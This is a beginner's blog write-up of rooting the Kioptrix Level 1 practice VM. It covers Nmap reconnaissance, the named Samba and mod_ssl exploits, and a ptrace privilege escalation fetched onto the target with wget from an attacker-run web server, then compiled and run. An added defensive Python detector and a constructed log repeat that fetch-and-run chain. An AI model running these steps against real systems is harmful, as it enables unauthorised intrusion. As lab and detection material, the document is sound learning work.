My First Root: A Hacker’s Diary on Kioptrix Level 1

Difficulty: Beginner-Friendly | Category: Boot2Root
Hello there,
I’m Adbin Magar, also known as TheGreyLens, diving headfirst into the wild world of cybersecurity, and my weekends are spent chasing that exhilarating feeling of popping a shell. My latest obsession? Vulnerable machines. I’ve decided to tackle a classic, a rite of passage for aspiring hackers: Kioptrix Level 1. The mission was simple, yet daunting: get root.
This post is my journey — the dead ends, the “aha!” moments, and the thought process behind the commands. Because let’s be honest, the real learning happens when your first plan blows up in your face.
🎯 The Challenge: Kioptrix Takedown
Category: Boot2Root / Vulnerable Machine
Description: A classic, purpose-built vulnerable machine to test fundamental penetration testing skills. The goal is to find a way in and become the all-powerful root user.
What we got: A freshly booted Kioptrix machine and my trusty Kali Linux sidekick.
When I first powered on the VM, I was met with a simple login screen. No hints, no breadcrumbs. Just a blinking cursor, practically daring me to break in. Challenge accepted. 😉

🔍 My Approach: The Hacker’s Playbook
Here’s the thing about Boot2Root challenges: they’re puzzles. You start with zero information and have to build your own map to the treasure.
Step 1: Casing the Joint (Reconnaissance is Everything)
Before you can pick a lock, you have to find the door. My first move was to find the machine on my network.
Tool of choice: arp-scan
A quick arp-scan -l on my Kali Linux machine did the trick, showing me all the devices on my local network. Ignoring my gateway IP address left me with a couple of other addresses. Then, with a quick check, I confirmed the Kioptrix machine was sitting at 192.168.1.4. Target acquired. Remember, this is a win.

With this IP in hand, it was time to see what this machine was made of. I fired up my favorite port scanner, Nmap, to see what services were listening.

The results were a goldmine. 🤑 A few things immediately jumped out:
An ancient version of OpenSSH on port 22.
An even more ancient Apache server (1.3.20) on ports 80 and 443.
And the big one… Samba on port 139.
My eyes lit up. Old versions of Samba are legendary for being full of holes. I had a feeling I knew exactly where to start.
Step 2: The First Plan Goes Sideways (The Samba Detour)
My research pointed to a famous vulnerability called “trans2open,” a classic remote code execution exploit for this version of Samba. Better yet, Metasploit has a ready-made module for it. This felt almost too easy.
I launched Metasploit, loaded up exploit/linux/samba/trans2open, set my RHOSTS to the target IP, and hit “exploit.”



And then… I waited. And waited. I made a tea. I checked my phone. I probably could have learned a new language. After three hours with nothing to show for it, I exited from it.

Lesson learned: The most obvious path isn’t always the fastest or the most reliable. A critical skill in hacking is knowing when to cut your losses and pivot.
Step 3: Finding a Better Door (The Apache Offensive)
Okay, back to the drawing board. I revisited my Nmap scan. What else did I have? That Apache 1.3.20 server looked very promising. An Apache server that old is practically a museum piece.
Tool of choice: searchsploit
I ran searchsploit Apache 1.3.20, and bingo! 🎯 A result came up, and after some research I found that “OpenFuck” is a well-known exploit that targets a vulnerability in the mod_ssl module of this specific Apache version.

Googling around, I stumbled on the OpenFuck exploit on GitHub.

I followed the instructions, compiled the exploit, and fired it at the server. Success! A shell appeared on my screen. It wasn’t root, but I was in. That’s a huge win.

Step 4: Climbing the Ladder (Privilege Escalation)
Gaining a foothold is one thing; owning the machine is another. Now I needed to escalate my privileges from a lowly user to the king of the castle: root.
My next step was to look for kernel exploits. The version of Linux running on Kioptrix was ancient (2.4.x), and those old kernels are notoriously weak. My research pointed me to a ptrace vulnerability.

Going back to searchsploit ptrace linux 2.4, I found a local privilege escalation exploit. Here’s how I got it onto the target:
I copied the exploit C file (3.c) from /usr/share/exploitdb/exploits/linux/local/ to my home directory.

On my Kali machine, I started a simple web server in that directory: python3 -m http.server 8080.
From my shell on the Kioptrix machine, I used wget to download the file from my Kali box.
I compiled the exploit on the target machine with gcc and ran it.

The script worked its magic, and moments later, I was staring at the most beautiful sight in hacking:
root
🚩 Victory!
Root access achieved. Kioptrix Level 1 conquered.
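Seen from the defender's side, the transfer steps in Step 4 (a web server account downloading a C file, compiling it and running the result) leave a recognizable process chain. The following detection sketch is an added example, not part of the original post; the log field layout, the "apache" account name and the 192.0.2.10 address are assumptions, and the log lines are constructed.

```python
import os
import re
import shlex

# Constructed process-execution records (not from the original post). The field
# layout, the "apache" account name and the 192.0.2.10 address are assumptions.
SAMPLE_LOG = """\
ts=1000 user=apache cwd=/tmp argv="wget http://192.0.2.10:8080/3.c"
ts=1012 user=apache cwd=/tmp argv="gcc -o 3 3.c"
ts=1015 user=apache cwd=/tmp argv="./3"
ts=2000 user=dev cwd=/home/dev/src argv="gcc -o tool tool.c"
ts=2005 user=dev cwd=/home/dev/src argv="./tool"
ts=9000 user=apache cwd=/tmp argv="wget http://192.0.2.10:8080/notes.txt"
"""

SERVICE_ACCOUNTS = {"apache", "www-data", "nobody"}  # assumed non-interactive accounts
DOWNLOADERS, COMPILERS = {"wget", "curl"}, {"gcc", "cc"}
WINDOW = 600  # seconds allowed between download and execution
LINE_RE = re.compile(r'ts=(\d+) user=(\S+) cwd=(\S+) argv="([^"]*)"')

def detect_staging(log):
    """Alert when a service account downloads C source, compiles it and runs the result."""
    state, alerts = {}, []  # state: (user, cwd) -> {"src", "t0", "out"}
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(2) not in SERVICE_ACCOUNTS:
            continue
        ts, user, cwd = int(m.group(1)), m.group(2), m.group(3)
        argv = shlex.split(m.group(4))
        if not argv:
            continue
        tool, key = os.path.basename(argv[0]), (user, cwd)
        s = state.get(key)
        if s and ts - s["t0"] > WINDOW:  # chain took too long: forget it
            del state[key]
            s = None
        if tool in DOWNLOADERS:
            src = [os.path.basename(a) for a in argv[1:] if "://" in a and a.endswith(".c")]
            if src:
                state[key] = {"src": src[0], "t0": ts, "out": None}
        elif tool in COMPILERS and s and s["src"] in argv:
            s["out"] = argv[argv.index("-o") + 1] if "-o" in argv[:-1] else "a.out"  # gcc default
        elif s and s["out"] and tool == os.path.basename(s["out"]):
            alerts.append({"user": user, "cwd": cwd, "source": s["src"],
                           "binary": s["out"], "seconds": ts - s["t0"]})
            del state[key]
    return alerts

print(detect_staging(SAMPLE_LOG))
```

Only the apache chain in /tmp is reported; the developer's own compile-and-run and the plain text download are ignored.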
What I Learned (And What You Can Take Away)
Don’t Get Tunnel Vision: My first plan with Samba failed, but I didn’t give up. The ability to pivot to a new attack vector based on your initial recon is a critical skill.
Recon is Your Best Friend: That Nmap scan was my treasure map. When the first path turned into a dead end, the map showed me another way forward.
Hacking is a Two-Step Process: Getting in (initial access) is only the first half of the battle. The second, often more complex part, is escalating your privileges to gain full control.
Kioptrix Level 1 is more than just a vulnerable machine; it’s a teacher. It teaches you methodology, patience, and the sheer joy of finally seeing that root prompt appear.
Lastly, happy hunting! 🚩


